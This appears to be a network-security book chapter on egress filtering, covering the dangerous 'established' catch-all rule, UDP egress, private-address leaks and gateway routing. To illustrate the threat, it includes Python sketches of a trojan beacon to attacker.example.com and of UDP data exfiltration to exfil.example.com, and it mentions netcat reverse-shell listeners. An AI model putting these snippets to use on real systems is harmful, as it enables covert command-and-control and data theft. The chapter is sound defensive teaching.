Exposing Weaknesses

Many exploits rely heavily on a target network's lax egress rules to be completely effective. These characteristics are important to understand because, in many cases, a savvy administrator can provide a second layer of defense that continues to secure his network (at least partially) even after the successful exploitation of a vulnerability.

Weaknesses in Egress Packet Filters

We've been asked by several security administrators, "What do you think is my most dangerous firewall rule?", as they're waving a multipage listing of packet filtering rules they haven't given us time to read. Many times, with a quick glance, we're able to say, "The first one." This isn't because we're trying to be pedantic or doubting their ability to construct an appropriate filter policy. It's because the first rule (whether written or implied by their firewall platform, as is sometimes the case) is actually very dangerous. Here's an example:

 permit tcp any any established 

If you search the Internet for "permit tcp any any established," you'll find over a hundred references (mostly by manufacturers of firewall and routing gear) recommending that users implement this rule, normally at the top of their firewall configuration. Even though most well-engineered packet filtering platforms include an implicit "deny all" at the bottom of the user-configured policy, many of them suggest that the last line of your policy implement an explicit "deny all" rule along the lines of:

 deny any any 

In our opinion, that last line is important, even if your packet filter does it automatically. When paired with this explicit deny-all rule, the first rule sounds innocent enough: deny everything, but allow "already-established" connections to flow. We've already explained stateful and stateless packet filtering techniques in Chapter 5, including what constitutes an established TCP connection, but we'll remind you that different firewall vendors have different definitions of stateful. More importantly, this rule may represent the most costly exposure your organization ever experiences once you've been infiltrated. The rule, by itself, is equivalent to saying "If you're inside my network, you may go anywhere on the Internet and use any service as long as you connect to it before it connects back to you."
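
The danger is easier to see when you consider what a stateless filter actually tests. With Cisco-style ACLs, for example, the established keyword simply matches any TCP segment that has the ACK or RST bit set; no connection table is consulted at all. The following Python sketch is our own illustration of that check, not any vendor's code:

ACK = 0x10
RST = 0x04

def matches_established(tcp_flags: int) -> bool:
    # A stateless "established" test: any packet with ACK or RST set is
    # treated as part of an existing connection and permitted.
    return bool(tcp_flags & (ACK | RST))

print(matches_established(0x10))  # True: a bare, crafted ACK sails through
print(matches_established(0x02))  # False: a lone SYN is blocked

A crafted inbound packet with nothing but the ACK bit set qualifies as "established" under this definition, which is one more reason to treat the catch-all rule with suspicion.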

Some vendors almost make this strategy feasible by providing transparent application layer filters, such as web proxies that strip inappropriate content like ActiveX controls and other potentially dangerous HTTP payloads. But that isn't enough, especially because these application layer filters can only operate on protocols they know about.

Case in point: Through our reconnaissance activities, let's say we determine that a remote computer is susceptible to some malicious code injection technique, and we exploit that vulnerability to place an egg or Trojan on the system that will phone home to us. We may have a netcat instance on a specific port of another system we've compromised, just waiting to receive a remote shell from our egg. You've just allowed us to run that communication through port 60501 (to pick an arbitrary destination port) if we wanted to. And while this may look odd enough to concern someone constantly monitoring net flows, in all likelihood, you aren't monitoring them. This situation is depicted in Figure 9-2.

Figure 9-2: A Trojan phoning home to provide a remote shell
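
To make the traffic pattern in Figure 9-2 concrete, here is a deliberately simplified Python sketch of a phone-home beacon; the host name and port are hypothetical, and on the attacker's side something as simple as a netcat listener would receive the connection. Because the victim initiates the session, the established catch-all passes every reply packet without complaint.

import socket

# Hypothetical attacker-controlled listener; any reachable host and any
# high port work equally well under the catch-all rule.
ATTACKER_HOST = "attacker.example.com"
ATTACKER_PORT = 60501

def phone_home() -> None:
    # The connection is initiated from inside the network, so the
    # "established" rule happily passes all of the return traffic.
    with socket.create_connection((ATTACKER_HOST, ATTACKER_PORT), timeout=10) as s:
        s.sendall(b"compromised host checking in\n")
        instructions = s.recv(4096)  # whatever the bot master sends back
        # ... act on the instructions ...

Nothing here is exotic, and that is precisely the point: the rule makes this traffic indistinguishable from any other internally initiated connection.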

As detailed in Chapter 17, botnets and spyware rely heavily on their ability to upload their spoils to a listening server controlled by the attacker. In the case of botnets, compromised machines are relatively useless unless they can converse with the predesignated control channel(s) to get their next set of instructions from the bot master. The fewer options these threats have for those communications, the safer your organization.

The TCP established catch-all rule is dangerous. Desktops within your organization (and even servers, for that matter) shouldn't be able to communicate over any protocol with any system on the Internet. In fact, you may be able to narrow their scope of activity down to under 20 protocols and allow those specifically, while denying everything else. There's also no reason you can't isolate those protocols and specifically allow them to be "established," saving yourself some work in the filter policy. Without this diligence, generally allowing any internally initiated TCP connection is a lazy administrator's way of reducing his workload while placing his organization at inordinate risk.
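
The logic of that tighter policy is simple enough to sketch in a few lines of Python; the allow list below is purely illustrative (your own short list of protocols will differ), and a real filter would express this as explicit permit rules followed by a deny-all.

# Illustrative outbound TCP services only -- substitute your own list.
ALLOWED_TCP_EGRESS = {22, 25, 80, 443}   # SSH, SMTP, HTTP, HTTPS

def egress_permitted(protocol: str, dst_port: int) -> bool:
    if protocol == "tcp" and dst_port in ALLOWED_TCP_EGRESS:
        return True
    return False  # everything else falls through to deny-all

print(egress_permitted("tcp", 443))    # True: sanctioned web traffic
print(egress_permitted("tcp", 60501))  # False: the phone-home from Figure 9-2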

Note 

"Protocols" here mean application-level protocols using TCP for transport, not protocols with distinct assigned numbers in the IP header, such as those listed in the /etc/protocols file on UNIX-based operating systems.

Tip 

To those who claim that allowing TCP to be established globally is necessary because of the diversity and complexity of your networks, we suggest familiarizing yourselves with NetFlow and flow-oriented tools such as argus. These tools will help you learn enough about your network to implement more sophisticated filters successfully, without disrupting your users or critical applications.
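
As one example of what that learning process looks like, the following Python sketch tallies the most common outbound TCP destination ports from exported flow records. The CSV file name and its column names (proto, dport) are assumptions for illustration; adapt them to whatever your collector (argus, a NetFlow exporter, and so on) actually produces.

import csv
from collections import Counter

def top_egress_ports(flow_csv: str, n: int = 20) -> list:
    # Count destination ports seen in outbound TCP flow records.
    counts = Counter()
    with open(flow_csv, newline="") as fh:
        for row in csv.DictReader(fh):
            if row["proto"].lower() == "tcp":
                counts[int(row["dport"])] += 1
    return counts.most_common(n)

# The result is a first cut at the "under 20 protocols" allow list
# discussed earlier in this section.
for port, hits in top_egress_ports("outbound-flows.csv"):
    print(port, hits)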

Even once you've removed your "allow any tcp established" catch-all, a sophisticated attacker will adapt and utilize something you're not filtering, such as TCP/80 or TCP/443, which you've explicitly allowed for web browsing. However, if you've implemented application layer firewalls (proxies), you may be able to catch them; at the very least you've raised the bar so fewer attackers can exploit the established rule. Application layer filters catch these kinds of attacks in various ways and with varying levels of success. Without them, you have almost no chance of defending against such threats.

We cannot simply focus on TCP. UDP is certainly less flexible when it comes to taking advantage of established rules on stateful firewalls, but it can be used to achieve largely the same effects. Some examples of exploiting egress using UDP include

  • Existing software programs such as Fryxar's Tunnelshell are able to create remote shells over UDP. Since many organizations unwittingly allow all inbound UDP traffic to port 53 (though this should not be done) for DNS-related purposes and don't restrict the egress of UDP at all, Fryxar's Tunnelshell (or similar software) can be used to create a remote access environment for the attacker that is difficult to detect (a minimal sketch of this kind of unrestricted UDP egress follows this list). See http://www.geocities.com/fryxar/.

  • UDP-based application layer protocols may be implemented asymmetrically with ease. Therefore, if you can listen on one port and talk on another, it is easy to confuse network security monitoring systems that don't necessarily put the two channels together to identify a threat.

  • Next-generation file sharing networks can utilize UDP to transmit files when TCP is restricted. This is an easy way to move data out of an organization.
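
As promised above, here is a minimal Python sketch of how trivially data can leave a network whose UDP egress is unrestricted. The collection host is hypothetical, and port 53 is chosen only because so many sites leave UDP/53 open end to end; any unfiltered port would do.

import socket

COLLECTOR = ("exfil.example.com", 53)  # hypothetical attacker-run listener

def leak(data: bytes) -> None:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # No handshake and no connection state: each datagram stands alone,
        # which is why "established"-style tracking does little for UDP.
        for i in range(0, len(data), 512):
            s.sendto(data[i:i + 512], COLLECTOR)
    finally:
        s.close()

leak(b"anything an attacker cares to move off the network")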

The bottom line is that egress needs to be restricted to as few protocols and endpoints as possible.

Weaknesses in Gateway Routing

There are two weaknesses we see time and time again with regard to gateway routing. Both are simple to understand and easy to correct.

Private Network Data Leaks

In order to simplify interior routing protocol configuration, many organizations configure their Internet gateway routers to "default" to their upstream provider's next hop. Many of these organizations have also made extensive use of IP addresses meant for private, internal use only (such as those listed in RFC 3330 and those specified in RFC 1918). While RFC 1918 states that data sent to these addresses should not be accepted if routed through your Internet provider, a number of providers accept it anyway and route it onward. Some organizations even collect this data on ISP networks for research purposes.
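
A quick way to audit for this condition is to check outbound destinations against the private address blocks. The sketch below uses Python's ipaddress module and covers only the three RFC 1918 ranges; the other special-use ranges from RFC 3330 could be added the same way.

import ipaddress

# Destinations in these blocks should never leave your network.
PRIVATE_NETS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]

def should_never_egress(dst: str) -> bool:
    addr = ipaddress.ip_address(dst)
    return any(addr in net for net in PRIVATE_NETS)

print(should_never_egress("10.10.40.25"))   # True: keep it inside
print(should_never_egress("198.51.100.7"))  # False: legitimate public space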

If certain routing protocols are misconfigured or new systems are added to the network exposing configuration problems, it is easy for data to leak out to the provider, causing unintended information disclosure. Consider the following example:

An organization is using the network 10.10.10.0/24 in their headquarters location. They are also using 10.10.20.0/24 in branch office A and 10.10.30.0/24 in branch office B, both of which are connected to the core headquarters router (which is also their default route) through point-to-point network links such as T-1 circuits. Now, let's say branch office C comes online using network 10.10.40.0/24, but is connected to branch office B instead of the headquarters location. In this situation, users in branch offices B and C will likely have no problem connecting to services in branch office C because they are directly connected, but users in the headquarters location and branch office A will be unable to connect unless routing entries are added to the headquarters router directing their packets (destined for 10.10.40.0/24) to branch office B as the next hop toward branch office C. Worse, without these entries in place, users at the headquarters location and branch office A may try to communicate with branch office C's network, and their data will leak out to the Internet (via the headquarters router's default route) instead of being directed to branch office C by way of branch office B, as shown in Figure 9-3.

Figure 9-3: A data leak occurring between branch offices
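
The leak is easy to reproduce with a longest-prefix match over the headquarters router's (hypothetical) routing table, sketched here in Python with the route for branch office C missing, exactly as in the example above.

import ipaddress

ROUTES = {
    ipaddress.ip_network("10.10.10.0/24"): "local (headquarters)",
    ipaddress.ip_network("10.10.20.0/24"): "branch office A link",
    ipaddress.ip_network("10.10.30.0/24"): "branch office B link",
    ipaddress.ip_network("0.0.0.0/0"):     "ISP (default route)",
}

def next_hop(dst: str) -> str:
    addr = ipaddress.ip_address(dst)
    matches = [net for net in ROUTES if addr in net]
    best = max(matches, key=lambda net: net.prefixlen)  # longest prefix wins
    return ROUTES[best]

print(next_hop("10.10.30.5"))  # branch office B link
print(next_hop("10.10.40.5"))  # ISP (default route): private data leaks upstream

Adding a 10.10.40.0/24 entry pointing at branch office B (or filtering RFC 1918 destinations at the egress, as discussed above) closes the hole.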

This specific threat is described in more detail in Chapter 2. Because hard-to-debug logical and physical routing changes can occur easily, your firewall configuration should give ample consideration to filtering such traffic attempting to egress your network (instead of simply assuming these conditions won't occur).

Connecting Internal Networks with Gateway Routers or Firewalls

Another router and/or firewall configuration issue leading to serious problems is the use of Internet gateway devices as local gateways between internal network segments. In order to save money, many organizations have added capacity to their existing gateway router or firewall to connect their internal networks. This also gives them the added benefit of being able to easily filter traffic between internal network segments and is recommended by some vendors, as depicted in Figure 9-4.

Figure 9-4: A firewall being used to connect internal network segments while also serving as the Internet gateway
Note 

The term "Internet gateway devices" is used here to mean any routing device acting as a gateway between the Internet and your organization's network. This may be a simple router, a combined router/modem, or even a firewall. In any case, the threat is still the same as discussed herein.

The problem with this configuration has nothing to do with the use of a firewall or router to connect internal network segments (and, further, has nothing to do with the placement of the device in conjunction with other network elements such as firewalls). The problem is that an externally (Internet) reachable gateway device is being used to do it. Needless to say, if an attacker were able to gain control over that device from the outside, he could wreak havoc with your internal routing. But infiltration isn't required, and this is where the real problem comes in. During a denial-of-service attack, not only will your Internet connection be flooded and/or disabled, but your gateway device is also likely to "fall over," causing internal performance or even reachability problems between your internal network segments, as shown in Figure 9-5.

Figure 9-5: A DDoS attack rendering internal networks unreachable

Other Egress Routing Considerations

Another strategy adopted by some large organizations is the removal of their default route altogether. If an organization participates in an exterior routing protocol (BGP, for example) with their Internet provider, they may elect to receive what is known as a full table (all routes known on the Internet) with or without a default route. This is especially useful if they have connections to multiple upstream ISPs and can select the best path for optimal performance. If they are receiving a full table, theoretically, they don't need a default route, because they know about all possible routes.

In this configuration, internal systems will be configured with a default route as they normally would, but your gateway router (the first/last hop in your network) would not have one, or it would set the gateway of last resort (default route) to a monitoring segment where traffic can be analyzed. This fits well with what you'll learn in Chapter 10. In fact, most organizations that run "defaultless" actually do have a default route that directs traffic into some kind of analysis system.

While it makes for an excellent darknet feeder and consequently a fast worm detector, we recommend you exercise extreme caution with this approach. An attacker who manages to disrupt your BGP session (or that of your provider) can render your circuits useless even while they are physically up, merely because you've lost your routing instructions and have no gateway of last resort.

While running defaultless at the edge of your network isn't feasible for many organizations, this methodology can be modified slightly to take limited advantage of the same idea. Certain workstations or servers (that presumably don't need to speak to the Internet except through proxies) may be configured without default routes. In this configuration, the servers can still be completely productive inside your network, but should they ever get compromised (infected by a worm, for example), they will be unable to reach Internet hosts (except potentially through proxies), which may stave off further infection or infiltration.
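
The effect on such a host is easy to picture: internal prefixes remain reachable, but anything else simply has nowhere to go. A small sketch, with made-up internal prefixes and a hypothetical proxy address:

import ipaddress

INTERNAL_ROUTES = [
    ipaddress.ip_network("10.0.0.0/8"),      # corporate space (illustrative)
    ipaddress.ip_network("192.168.0.0/16"),  # lab space (illustrative)
]

def reachable(dst: str) -> bool:
    # With no default route, only explicitly routed internal space is usable.
    addr = ipaddress.ip_address(dst)
    return any(addr in net for net in INTERNAL_ROUTES)

print(reachable("10.10.20.15"))  # True: other internal hosts still work
print(reachable("203.0.113.9"))  # False: a worm's call-out simply dies
print(reachable("10.10.10.80"))  # True: a sanctioned internal web proxy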


